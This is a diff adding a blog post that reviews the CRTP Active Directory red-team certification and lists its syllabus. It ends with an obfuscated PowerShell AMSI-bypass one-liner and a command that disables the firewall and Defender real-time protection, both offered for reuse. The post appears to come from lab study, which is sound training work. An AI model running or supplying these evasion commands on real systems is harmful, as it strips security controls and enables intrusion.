--- a/_posts/2022-12-09-crtp.md
+++ b/_posts/2022-12-09-crtp.md
@@ -2,9 +2,32 @@
 layout: post
 title: "Certified Red Team Professional (CRTP) Review"
 permalink: "crtp"
-date: 09-12-2022
+date: 13-11-2022
 categories: Blog
 ---
 
+Recently I passed the Certified Red Team Professional (CRTP) which was an excellent course provided by Pentester Academy. The course is all focused on Active Directory hacking but instead of using Kali we instead use a Windows box to priv esc and move around the AD network with the help of PS Remoting mainly. The best part about this course is we are working in an environment with MS Defender and AMSI scanning in place so although being stealthy (aka Red Teaming) isn't a requirement it is necessary to bypass these restrictions.
 
-This will contain a review as soon as I get a chance to publish it...
+The course consists of the following sections but to be honest for the exam the 'Defenses' topics aren't required:
+
+* Active Directory Enumeration
+* Local Privilege Escalation
+* Domain Privilege Escalation
+* Domain Persistence and Dominance
+* Cross Trust Attacks
+* Forest Persistence and Dominance
+* Defenses – Monitoring
+* Defenses and bypass – Architecture and Work Culture Changes
+* Defenses and Bypass – Deception
+* Defenses and Bypass – PowerShell
+
+One of the key things when going from box to box I learned is how to disable AMSI and also open up the firewall and disable real-time monitoring. These were the two Powershell commands I ran each time which might be useful for others:
+
+````
+S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
+```
+
+```
+{% highlight powershell %}
+Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False;Set-MpPreference -DisableIOAVProtection $true;Set-MpPreference -DisableRealtimeMonitoring $true
+```
